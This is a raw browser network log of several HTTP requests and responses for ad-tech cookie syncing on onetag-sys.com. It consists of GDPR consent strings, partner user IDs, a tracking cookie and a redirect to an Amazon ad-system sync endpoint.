GET /match/?int_id=113&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&callback=https%3A%2F%2Fs.amazon-adsystem.com%2Fecm3%3Fex%3Donetag.com%26id%3D%24%7BUSER_TOKEN%7D&ot_initiated=1 HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/usync/?pubId=69f48c2160c8113&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA
cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 302

cache-control: no-transform, no-cache
p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:15; domain=onetag-sys.com; SameSite=None; Secure;
location: https://s.amazon-adsystem.com/ecm3?ex=onetag.com&id=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
content-length: 0
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
GET

https://onetag-sys.com/match/?int_id=3&uid=1e26cb9ffc8ce78cb36c1928fca28a2&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1

Request

GET /match/?int_id=3&uid=1e26cb9ffc8ce78cb36c1928fca28a2&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1 HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

cache-control: no-transform, no-cache
p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:14; domain=onetag-sys.com; SameSite=None; Secure;
content-length: 0
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
GET

https://onetag-sys.com/match/?int_id=164&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&uid=cb8d0a59-ea48-4c94-be29-e302831c6e91

Request

GET /match/?int_id=164&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&uid=cb8d0a59-ea48-4c94-be29-e302831c6e91 HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

cache-control: no-transform, no-cache
p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:17; domain=onetag-sys.com; SameSite=None; Secure;
content-length: 0
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
GET

https://onetag-sys.com/match/?int_id=2&uid=LWMWFQEC-L-7WEQ&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

Request

GET /match/?int_id=2&uid=LWMWFQEC-L-7WEQ&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

cache-control: no-transform, no-cache
p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:17; domain=onetag-sys.com; SameSite=None; Secure;
content-length: 0
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
GET

https://onetag-sys.com/match/?int_id=107&uid=2880508470074793702

Request

GET /match/?int_id=107&uid=2880508470074793702 HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

cache-control: no-transform, no-cache
p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:17; domain=onetag-sys.com; SameSite=None; Secure;
content-length: 0
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
GET

